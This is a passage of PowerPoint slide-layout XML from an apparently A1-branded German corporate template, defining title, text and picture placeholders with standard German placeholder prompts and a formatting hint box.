            <a:off x="695325" y="558800"/>
            <a:ext cx="5220612" cy="5500800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"/>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A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16104B0D-DEDA-459F-92B7-ACC13E6820E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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242280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Inhalt rechts">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A477D7-8599-4221-9C4D-C31A9A26C441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Grafik 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F97D970-EE5F-47A7-AD24-01504CC591E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802D4D1B-D2C9-4BB2-9590-A3BD9F832DF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechteck 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0705B1-D36D-4D65-A3A6-90546CD7E386}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C996413-044C-42C1-934F-18AF14A8D760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686475" y="487656"/>
            <a:ext cx="5220000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A62680-894C-4CDE-AD9A-42EE8C9BA889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695325" y="1710817"/>
            <a:ext cx="5220612" cy="4356000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9414283C-C578-402F-98C4-79C2D5115F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="558799"/>
            <a:ext cx="5220612" cy="5500800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"/>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A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16104B0D-DEDA-459F-92B7-ACC13E6820E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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624612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 mit Überschrift">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3536586-6D4F-46CF-B833-9E38923A2282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Grafik 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{701C8E8C-EBE2-454A-820D-79D052474967}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Textfeld 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978DA774-9457-49A0-ACF3-DA6A6609FB3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rechteck 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB04D344-014D-495E-8E40-C222AD62BCF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C288632C-E78B-412F-9AE0-E405AF2DF825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117E6E95-6798-4614-B697-2D82A12C2595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1238649"/>
            <a:ext cx="10800000" cy="4824000"/>
          </a:xfrm>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="360000" rIns="360000" bIns="180000" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800" i="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r">
              <a:defRPr sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertextformat bearbeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Zweite Ebene</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3CFF662-54DC-4A7D-B22B-084262ECFC8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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44147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 helles Bild">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751D73C5-5FDD-4823-816D-BDEFD9D375AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="72000"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63194F4A-212B-4FB5-B826-5F7FA3B9217C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="1175249"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3ED52C9-0C7E-4138-812E-555BC2DA471F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="4740774"/>
            <a:ext cx="10800000" cy="1584000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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19" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ACC0FE4-3ADC-4201-A1D6-172B37E58296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8980200" y="5883257"/>
            <a:ext cx="2516400" cy="5436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4051144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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52D5A5D-16B1-484F-A4ED-1F19E15C586B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Grafik 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99020CEE-B406-4506-BEF4-7359508271B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Textfeld 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FE3927-2ADB-415D-A78F-4A9DD5D9B60C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rechteck 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04C9A32-A653-4102-B1A1-C91EDE2E91AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117E6E95-6798-4614-B697-2D82A12C2595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="554649"/>
            <a:ext cx="10800000" cy="5508000"/>
          </a:xfrm>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="360000" rIns="360000" bIns="180000" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800" i="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r">
              <a:defRPr sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertextformat bearbeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Zweite Ebene</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C00B9D0-7615-4F5B-81CC-DCA8926AF46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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1745267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9" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A3C5DA-BB1C-4188-ADE6-8DC80F71E120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
